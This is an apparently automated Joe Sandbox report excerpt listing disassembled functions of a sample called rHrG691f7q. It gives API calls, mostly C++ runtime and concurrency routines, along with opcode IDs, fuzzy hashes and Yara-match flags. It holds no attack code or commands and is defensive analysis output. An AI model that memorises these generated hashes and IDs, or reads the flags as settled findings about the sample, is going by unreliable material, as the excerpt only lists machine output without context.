                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4284812201-0
                                                                                                                                                                                                                                                                    • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                    • Instruction ID: eac07f53f57a1d05a74adbcbdcc8a4ae022a4fffd785b842303492d79dca9dd0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F0B431704704A7EF147EBA087057E31979F55314F24416FE91A9F380DEB59D419A94
                                                                                                                                                                                                                                                                    Function 024DD074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024DD088
                                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024DD0AC
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024DD0BF
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024DD0CD
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3657713681-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction ID: b133972a85dcb78e6fe189d8df57f1c85926d33bdfad2fd17e28cae86ba71ccd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F05936E00204E3C725FA16D860D5EB37A9ED0B183A0852FD80557289DB31A90ACE62
                                                                                                                                                                                                                                                                    Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                                                                                                                                                                                    Function 024C5A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024C5A83
                                                                                                                                                                                                                                                                    • __Cnd_signal.LIBCPMT ref: 024C5A8F
                                                                                                                                                                                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 024C5AA4
                                                                                                                                                                                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024C5AAB
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction ID: e1708fdd5644ad95e6e352a4f0b99c7eb75359d2f58bfffaa21d6bff62617db7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0E539400700EFEB657B7BD80571A73E3AF01328F74482FE05A969A0DFBAE8148E55
                                                                                                                                                                                                                                                                    Function 024D2858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024D286F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,024D8830,?,?,?,?,00000000,?,00000000), ref: 024D287E
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2894
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D28A2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3803302727-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction ID: e3f0846953e47bae62c94b55cea0850d469fd2712403c4d290456520c8063172
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F0A03450020ABBCF00EFB5CD44EAF37B86B00701F200616F921E20A1DB75D6049B64
                                                                                                                                                                                                                                                                    Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 200240550-0
                                                                                                                                                                                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                                                                                                                                                                                    Function 024D257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 024D2593
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,024D0DA0), ref: 024D25A1
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D25B7
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D25C5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 200240550-0
                                                                                                                                                                                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction ID: 4fb4ebef4aa5b2efcda973f871db5de69500fc4089e686306d836a9479c7901b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE0D86160021539EB10F7764C32F7B369C5B00B41F54085AFD15E21C2FAD5E10449A4
                                                                                                                                                                                                                                                                    Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00423991
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                    • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                                                                                                                                                                                    Function 024D9530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024D2959: TlsAlloc.KERNEL32(?,024D0DA0), ref: 024D295F
                                                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,024D0DA0), ref: 024E3BE6
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 024E3BF8
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024E3C0E
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E3C1C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3735082963-0
                                                                                                                                                                                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                    • Instruction ID: 02904571e3068f448a2adb13cf8600342ef3c3ecb4dba3a42be15e99bcb7cbe2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E061345002056FDB00FF775C5967F3A646A003037100EABE927D31E2EB35D0054E5C
                                                                                                                                                                                                                                                                    Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                    • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                                                                                                                                                                                    Function 024D2794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D279E
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0), ref: 024D27AD
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D27C3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D27D1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3016159387-0
                                                                                                                                                                                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                    • Instruction ID: 2273669cd7aa61b4e11c449df833e79c751df83d04d4f1c7c7468d3929b81fd5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E0867860010AA7CB10FBB6DD49EAF73BC6E00B06B600566E915E3151EBA9D7088B79
                                                                                                                                                                                                                                                                    Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                    • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                                                    Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                                                    Function 024D28EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 024D28F8
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 024D2904
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D291A
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2928
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                    • Instruction ID: ffb71400c590614d438e3b0c0ec50f2094892fbde1828a2bbec055433c675308
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E0863460010967DF14FF72CD05BBB37AC7F00745B500966FC15D20A1EB76D1048A98
                                                                                                                                                                                                                                                                    Function 024D29B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000,024D7BD8,00000000,?,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29BE
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024D29CA
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D29E0
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D29EE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction ID: 831fb25a63ebcbc694f7501391d7b1f5e527aae6e41b028b5350b1b541343898
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E086342001096BDF10FF71CC08BBF376C6F00745B500966FD19D20A1EB76D1149AA8
                                                                                                                                                                                                                                                                    Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
